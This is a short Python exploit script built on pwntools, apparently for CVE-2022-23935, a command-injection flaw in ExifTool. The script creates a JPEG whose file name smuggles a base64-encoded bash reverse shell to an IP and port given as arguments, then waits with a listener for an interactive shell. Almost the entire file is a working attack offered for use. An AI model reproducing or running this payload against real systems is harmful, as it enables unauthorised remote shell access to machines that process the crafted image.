#!/usr/bin/python3

from pwn import *
import base64
import sys

class ExploitExiftools:
    def __init__(self,ip,port):
        self.ip = ip
        self.port = port
        self.p = log.progress("")

    def printBanner(self):
        print("""
   _____ __      __ ______      ___    ___  ___   ___        ___   ____    ___  ____   _____ 
  / ____|\ \    / /|  ____|    |__ \  / _ \|__ \ |__ \      |__ \ |___ \  / _ \|___ \ | ____|
 | |      \ \  / / | |__  ______  ) || | | |  ) |   ) |______  ) |  __) || (_) | __) || |__  
 | |       \ \/ /  |  __||______|/ / | | | | / /   / /|______|/ /  |__ <  \__, ||__ < |___ \ 
 | |____    \  /   | |____      / /_ | |_| |/ /_  / /_       / /_  ___) |   / / ___) | ___) |
  \_____|    \/    |______|    |____| \___/|____||____|     |____||____/   /_/ |____/ |____/         

                                            by 0xFTW                                                                                
        """)

    def generateExploit(self):
        self.p.status("Generating payload ....")
        cmd = bytes(f'/bin/bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1','UTF-8')
        encodedName = base64.b64encode(cmd) 
        image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
        imageName = f"echo {encodedName.decode()} | base64 -d | bash |"
        with open(imageName, "wb") as img:
            img.write(base64.decodebytes(image))
        self.p.status(f"Payload generated and saved as '{imageName}'")

    def starting_listner(self):
        l = listen(self.port)
        conn = l.wait_for_connection()
        self.p.success("Connected!!!!")
        conn.interactive()

if __name__ == "__main__":

    if len(sys.argv) != 3:
        error(f"Usage: {sys.argv[0]} IP PORT")

    if len(sys.argv) == 3:
        exploit = ExploitExiftools(sys.argv[1],sys.argv[2])

    exploit.printBanner()
    exploit.generateExploit()
    exploit.starting_listner()